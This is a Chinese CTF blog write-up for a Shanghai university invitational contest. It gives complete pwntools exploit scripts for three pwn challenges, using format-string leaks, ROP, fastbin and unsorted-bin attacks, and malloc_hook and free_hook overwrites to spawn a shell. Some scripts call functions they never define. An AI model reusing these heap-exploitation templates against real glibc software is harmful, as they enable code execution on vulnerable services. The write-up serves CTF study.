上海大学生邀请赛

字数统计: 1.4k字   |   阅读时长≈ 7分

这比赛有点意思,我就看了俩题,结果两个Pwn都是原题。改改脚本就随便出来了。后面重点做一下那个 vmpwn

EasyAbnormal

程序分析

和2020 湖湘杯那个 blendpwn一摸一样,改改脚本直接就出了。原理可以参考我之前的 湖湘杯WriteUp

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])


debug = 1
if debug == 1:
    p = process('./pwn')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    elf = ELF('./pwn')
else:
    p = remote('123.56.52.128', 10012)
    elf = ELF('./pwn')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


def show_name():
    p.sendlineafter("CHOICE :", "1")


def add(content=b"\n"):
    p.sendlineafter("CHOICE :", "2")
    p.sendafter("cnt:\n", content)


def delete(index):
    p.sendlineafter("CHOICE :", "3")
    p.sendlineafter("idx:", str(index))


def show():
    p.sendlineafter("CHOICE :", "4")


def magic(content):
    p.sendlineafter("CHOICE :", "23333")
    p.sendafter("INPUT:", content)

def pwn():
    payload = "%p-%p"
    p.sendafter("NAME: ", payload)
    show_name()
    p.recvuntil("INFO:")
    stack_address = int(p.recvuntil("-", drop=True), 16) + 0x2680
    libc_base = int(p.recvline(), 16) - 0x3c6780

    p_rdi_ret = libc_base + 0x21112
    bin_sh_addr = libc_base + next(libc.search('/bin/sh\x00'))
    system_addr = libc_base + libc.sym['system']
    print 'bin_sh_addr:', hex(bin_sh_addr)
    print 'system_addr:', hex(system_addr)
    print 'p_rdi_ret:', hex(p_rdi_ret)

    payload = p64(0) * 3 + p64(p_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)

    New('a')
    New(payload)
    Delete(1)
    Delete(0)

    ShowNote()
    p.recvuntil('index 1:')
    heap_addr = u64(p.recvuntil('\n', drop=True).ljust(8, '\x00')) - 0x80
    print 'heap_addr:', hex(heap_addr)

    #gdb.attach(p, 'bp $rebase(0x11b8)')
    payload_addr = heap_addr + 0xa0
    payload = p64(payload_addr) * 6  # *6
    Magic(payload)

    p.interactive()


pwn()

maj0rone

一看到这个混淆瞬间就觉得在哪里做过。后面找了找,就是 2020 ciscn的一道题。可以参看我之前的 2020 ciscn的writeup

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
from pwn import *

context.update(arch='amd64', os='linux', log_level='debug')

p = process('./pwn')
elf = ELF('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
gadgets = [0x45226, 0x4527a, 0xf0364, 0xf1207]


def new(size, content):
    p.recvuntil('>> ')
    p.sendline('1')
    p.recvuntil('please answer the question\n')
    p.sendline(str(80))
    p.recvuntil('______?')
    p.sendline(str(size))
    p.recvuntil('start_the_game,yes_or_no?')
    p.sendline(content)


def delete(idx):
    p.recvuntil('>> ')
    p.sendline('2')
    p.recvuntil('index ?')
    p.sendline(str(idx))


def show():
    p.recvuntil('>> ')
    p.sendline('3')


def edit(idx, content):
    p.recvuntil('>> ')
    p.sendline('4')
    p.recvuntil('index ?')
    p.sendline(str(idx))
    p.recvuntil('__new_content ?')
    p.send(content)


def pwn():
    new(0xe0, '0')
    new(0x60, '1')
    new(0x60, '2')
    new(0x60, '3')

    delete(0)
    new(0x60, '4')
    edit(0, '\xdd\x25')
    delete(1)
    delete(2)
    edit(2, '\x00')

    new(0x60, '5')
    new(0x60, '6')
    new(0x60, '7')
    payload = 'a' * 0x33 + p64(0xfbad1800) + p64(0) * 3 + '\x00'
    edit(7, payload)

    libc_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    print 'libc_addr:', hex(libc_addr)
    stdout_addr = libc_addr + 0x20
    libc_base = stdout_addr - libc.sym['_IO_2_1_stdout_']
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    fake_chunk = malloc_hook - 0x23
    gadget = gadgets[3] + libc_base
    print 'libc_base:', hex(libc_base)
    print 'malloc_hook:', hex(malloc_hook)
    print 'fake_chunk:', hex(fake_chunk)
    print 'gadget:', hex(gadget)

    new(0x60, '8')
    new(0x60, '9')
    new(0x60, '10')
    delete(9)
    delete(10)
    edit(10, p64(fake_chunk))
    # gdb.attach(p)
    new(0x60, '11')

    payload = 'a' * 0x13 + p64(gadget)
    new(0x60, payload)
    # gdb.attach(p)
    edit(12, payload)
    # new(0x60, '12')
    p.recvuntil('>> ')
    p.sendline('1')
    p.recvuntil('please answer the question\n')
    p.sendline(str(80))
    p.recvuntil('______?')
    p.sendline(str(0x60))
    p.interactive()


i = 0
while 1:
    i += 1
    log.warn(str(i))
    try:
        pwn()
    except Exception:
        p.close()
        p = process('./pwn')
        continue

lgtwo

程序分析

image-20201118150726370

Add函数很常见的off-by-one漏洞,可以用此实现堆重叠。

利用分析

Off-by-one漏洞可以实现修改一个堆块的 size,使其覆盖到后续的多个堆块。首先构造如下堆块结构,其中 chunk10xf1是为了 使其size0x100,这样通过 off-by-one漏洞,可以修改 size的最低一字节,使其覆盖 chunk2chunk3

1
2
3
4
5
6
7
Add(0xf8, 'a')  #0
Add(0xf8, 'a')   #1
Add(0x68, 'a')   #2
Add(0x68, 'a')   #3
Add(0x68, 'a')  #4
Add(0x18, 'a')   #5
Add(0x18, 'a')  #6

释放 chunk1,然后使用 chunk0off-by-one漏洞覆盖 chunk1size0x1e1,然后再申请0x1d8chunk1,此时chunk1即可覆盖 chunk2chunk3

然后依次释放 chunk4chunk3fastbin中,此时 chunk2 、 chunk3 和 chunk4 的堆头地址除了最后一字节不同以外,其他都相同。然后使用 chunk1修改 chunk2size0xe1并修改 chunk3fd的最后一字节为 0x00,使其指向 chunk2 ,再释放 chunk2进入 unsortedbin。 使用 chunk1修改 chunk2fd指向 stdout

然后,使用fastbin attack分配 stdout结构体,泄露地址。

然后,直接修改 malloc_hookone_gadget地址 我没成功。

转而再次使用 Unsorted attackfree_hook上面踩出 libc地址,留下 0x7fsize。最后再次使用 fastbin attack分配到 free_hook上面的伪造chunk,修改 free_hooksystemgetshell

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug:
    p = process("./pwn")
    # p = process('./pwn',env={'LD_PRELOAD':'./libc.so'})
    elf = ELF("./pwn")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
    p = remote("123.56.52.128",45830)
    elf = ELF("./pwn")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

gadgets = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def Add(size, content):
    p.sendlineafter('>> ', '1')
    p.sendlineafter('size?', str(size))
    p.sendlineafter('content?', content)

def Delete(idx):
    p.sendlineafter('>> ', '2')
    p.sendlineafter('index ?', str(idx))

def Show(idx):
    p.sendlineafter('>> ', '3')
    p.sendlineafter('index ?', str(idx))

def Edit(idx, content):
    p.sendlineafter('>> ', '4')
    p.sendlineafter('index ?', str(idx))
    p.sendafter('new content ?\n', content)

while True:
    try:
        payload = 'a'
        Add(0xf8, 'a')  #0
        Add(0xf8, 'a')   #1
        Add(0x68, 'a')   #2
        Add(0x68, 'a')   #3
        Add(0x68, 'a')  #4
        Add(0x18, 'a')   #5
        Add(0x18, 'a')  #6

        Delete(1)
        payload = 'a'*0xf0 + p64(0) + b'\xe1'
        #Delete(3)
        Edit(0, payload)
        # gdb.attach(p, 'bp 0x400cb5')
        Add(0x1d8, 'a') #1
        #into fastbin
        Delete(4)
        Delete(3)
        payload = 'a'*0xf0 + p64(0) + p64(0xe1) + '\x00'*0x60 + p64(0) + p64(0x71) + '\x00'
        Edit(1, payload)
        #into unsortedbin
        Delete(2)
        payload = 'a'*0xf0 + p64(0) + p64(0x71) + '\xdd\x25'
        Edit(1, payload)

        Add(0x68, 'a')   #2
        Add(0x68, 'a')   #3
        Add(0x68, 'a')   #4  chunk2

        payload = "\x00" * 3 + p64(0) * 0x6 + p64(0xfbad2887 | 0x1000) + p64(0) * 3 + b"\x00"
        Edit(4, payload)
        libc_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
        libc.address = libc_addr - 0x3c5600
        print 'libc.addr:',hex(libc.address)
        malloc_hook = libc.sym['__malloc_hook']
        gadget = gadgets[3] + libc.address
        print 'gadget:',hex(gadget)
        if b"\x7f" not in p64(libc.address):
            raise EOFError
        log.success("libc address {}".format(hex(libc.address)))
        break
    except:
        p.close()
        p = process('./pwn')
gdb.attach(p, 'bp 0x400cb5')
free_hook = libc.sym['__free_hook']
system_addr = libc.sym['system']
fake_chunk = free_hook - 0x33

#unsortedbin attack
payload = 'a'*0xf0 + p64(0) + p64(0x71) + p64(0) + p64(fake_chunk)
Edit(1, payload)
Add(0x68, '/bin/sh\x00')   #3

Delete(2)
payload = 'a' * 0xf0 + p64(0) + p64(0x71) + '\x00' * 0x60 + p64(0) + p64(0x71) + p64(free_hook-0x23)
Edit(1, payload)

Add(0x68, '/bin/sh\x00')  #2
Edit(2, '/bin/sh\x00')
Add(0x68, 'a')  #8, fake_chunk
payload = 'a'*0x13 + p64(system_addr)
Edit(8, payload)

p.sendlineafter('>> ', '2')
p.sendlineafter('index ?', '2')

p.interactive()

Pwn()

cpu_emulator

这道题是 vmpwn,后面把Kernel入门学完,系统做一下 vmpwn的相关题目,再来做这道题吧。

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing